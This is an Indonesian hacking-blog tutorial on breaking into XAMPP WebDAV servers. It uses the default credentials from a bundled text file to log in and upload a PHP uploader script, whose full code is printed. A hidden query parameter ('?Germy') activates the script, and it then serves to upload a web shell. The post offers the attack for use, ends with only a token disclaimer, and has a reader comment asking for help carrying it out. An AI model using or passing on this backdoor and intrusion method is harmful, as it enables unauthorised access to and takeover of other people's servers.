Jumat, 02 Desember 2016

Exploit Webdav Server Bypass Shell Upload

Exploit Webdav Bypass Shell Upload - Hallo Sobat blogger untuk pertemuan kali ini saya akan berbagi informasi seputar dunia sistem keamanan. Di sini kita membahas celah dari Webdav mari kita simak.
Exploit Webdav Bypass Shell Upload
Exploit Webdav Bypass Shell Upload

Pembahasan

1. Bagi sobat yang sudah install xampp sobat bisa lihat pada folder xampp/webdav/webdav.txt dan isi dari file tersebut adalah
WEB-DAV für den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente über den Apache2.

Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: http://localhost/webdav/
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben. 
Lokales Directory: /xampp/webdav/
2. Di situ sobat sudah menemukan User dan Password Defaultnya Yaitu :
User: wampp 
Password: xampp
3. Jika sudah sobat bisa download WinSCP yang nantinya kita gunakan untuk media upload file.
4. Sobat siapkan file uploader. Berikut scriptnya.
<?php if(isset($_GET['Germy']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>Germy Uploaded Area</h2><hr>";
echo "<form action="" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="UPLOAD IT">
</form>";
if ($_FILES["file"]["error"] > 0)
{
echo "Error: " . $_FILES["file"]["error"] . "<br />";
}
else
{
echo "Upload: " . $_FILES["file"]["name"] . "<br />";
echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
echo "Stored in: " . $_FILES["file"]["tmp_name"];
}
if (file_exists("" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " already exists. ";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo "Stored in: " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}

?>
5. Cara Memanggil "File.php?Germy" Jika kalian bertanya kenapa tidak langsung shell saja? Lebih baik kalian coba sendiri ^_^
Untuk tutorialnya sobat bisa lihat video di bawah ini.

Video Tutorial


Sekian Informasi yang dapat saya berikan untuk sobat Ambarawa Cyber Army sekalian semoga bermanfaat. dan segala hal yang dapat merugikan atau di salah gunakan sudah tertulis pada Terms Of Services.

2 komentar:

  1. cara uploadnya gimana? itu videonya kena hapus youtube tolong perbaiki

    BalasHapus